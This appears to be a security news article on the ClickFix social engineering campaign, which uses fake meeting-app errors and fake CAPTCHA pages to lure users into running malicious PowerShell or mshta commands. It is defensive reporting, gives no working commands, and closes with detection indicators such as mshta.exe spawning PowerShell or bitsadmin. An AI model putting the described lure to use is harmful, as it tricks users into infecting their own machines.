The emergence of a new social engineering tactic known as ClickFix has raised concern among cybersecurity experts. The Sekoia Threat Detection & Research (TDR) team recently unveiled this deceptive strategy, originally identified by Proofpoint in March, in a detailed report released today. ClickFix, also referred to as ClearFake, manipulates fake error messages on various platforms, including Google Meet and Zoom, to deceive users into running harmful PowerShell commands that ultimately lead to device infections.
The ClickFix tactic varies its approach depending on the operating system being targeted. For macOS users, the tactic prompts them to click on a “fix it” prompt, which triggers an automatic download and installation of malware in .dmg format. On the other hand, Windows users may encounter either a malicious mshta or PowerShell command, with the latter commonly disguised as a troubleshooting procedure originating from the legitimate Explorer.exe process to avoid detection.
In addition to popular video conferencing platforms, ClickFix has also been observed utilizing fake CAPTCHA pages to entice users into executing steps that activate malicious code, causing infections on both Windows and macOS systems. By leveraging GitHub and suspicious websites, cybercriminals redirect unsuspecting users to these deceptive pages, where a simple PowerShell script is employed, making it challenging to detect but highly impactful.
To combat ClickFix and similar social engineering techniques, the TDR team recommends monitoring for suspicious activities, such as PowerShell and bitsadmin processes with mshta.exe as the parent process, command lines containing URLs indicative of malicious downloads, and network activities involving PowerShell connections to low-prevalence or suspicious domains. By implementing these detection techniques in conjunction with threat intelligence, organizations can bolster their defense mechanisms against the evolving threat posed by ClickFix.
Sekoia emphasized the importance of continuously tracking the delivery infrastructure of ClickFix and enhancing detection capabilities to mitigate the associated risks effectively. As cybercriminals continue to refine their tactics, staying vigilant and adopting proactive cybersecurity measures will be crucial in safeguarding against social engineering attacks like ClickFix.